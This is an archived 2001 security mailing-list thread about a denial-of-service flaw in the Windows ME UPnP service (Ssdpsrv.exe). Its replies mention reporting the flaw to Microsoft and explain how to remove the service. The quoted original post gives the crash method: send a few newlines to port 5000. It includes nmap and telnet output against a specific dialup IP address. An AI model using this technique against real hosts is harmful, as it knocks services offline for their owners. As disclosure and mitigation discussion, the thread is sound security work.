Sorry I was away on vacation Thurdsay and Friday. I already discovered this problem and reported it to Microsoft.
In fact I found two more DOS attacks than just crashing the server. It appears to me that only a particular OEM enabled this service by default. (I know from whom you purchased your box.) The some vulnerabilities I found extend into XP too. I wrote a paper on it and am waiting until Microsoft gives me the OK to release it. They are in the process of fixing it. Sincerely, 'ken' Alan Wright wrote: > This is a cross post out of general interest to security basics. > Firstly you have to wonder why someone is running this service. > I personally only found out after using a ports traffic analyzer. I will > pass the url for the program on if you want it but do not want to be > seen to plug if against the rules of the forum. :-) > > Secondly Windows Millenium installs the service without telling you that > it has done so when you do a basic install. > Remove it using Control Panel, Add/Remove progs ,windows setup. > communications, ckick on Universal plug and pray, (sic) and then apply. > > > > > At 19:46 17/10/2001 -0500, you wrote: > >> By connecting to a computer running Ssdpsrv you are able to crash the >> Ssdpsrv server. >> >> Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. >> This service comes standard with the WindowsME installation. >> >> The Ssdpsrv.exe server is started at boot. >> Here is the registry entry: >> KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices >> Here is the file that starts the server: >> c:\windows\system\ssdpsrv.exe >> >> For information about UPnP go here: >> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP >> >> Upon running a scan on a computer running the server I get the following: >> <snip> >> bash-2.05$ nmap -sT 165.121.234.217 >> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ ) >> Interesting ports on user-2injqmp.dialup.mindspring.com >> (165.121.234.217): >> (The 1547 ports scanned but not shown below are in state: closed) >> Port State Service >> 139/tcp open netbios-ssn >> 5000/tcp open fics >> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds >> </snap> >> >> Method to crash Ssdpsrv: >> Connect to the computer on port 5000. >> Send 3 to 5 newline characters. >> You then get an error and are disconnected. >> <snip> >> bash-2.05$ telnet 165.121.234.217 5000 >> Trying 165.121.234.217... >> Connected to 165.121.234.217. >> Escape character is '^]'. >> >> >> >> HTTP/1.1 400 Bad Request >> >> Connection closed by foreign host. >> bash-2.05$ >> </snap> >> >> Here is the error caused by the crash: >> Ssdpsrv has caused an error in MSVCRT.DLL. >> Ssdpsrv will now close. >> If you continue to experience problems, >> try restarting your computer. >> >> This causes the server crash and closes port 5000. >> Either you must restart the server by manually running ssdpsrv.exe >> or reboot. >> >> shouts to pulltheplug #c. >> :o >> >> _________________________________________________________________ >> Get your FREE download of MSN Explorer at >> http://explorer.msn.com/intl.asp > > > All the best > > Alan > > > > Alan J Wright B.Sc(Hons)(Open) > SMS +47624462772. > Email [EMAIL PROTECTED] > [EMAIL PROTECTED] > > > 'You're a feisty little one but you'll soon learn respect' > > Return of the Jedi >
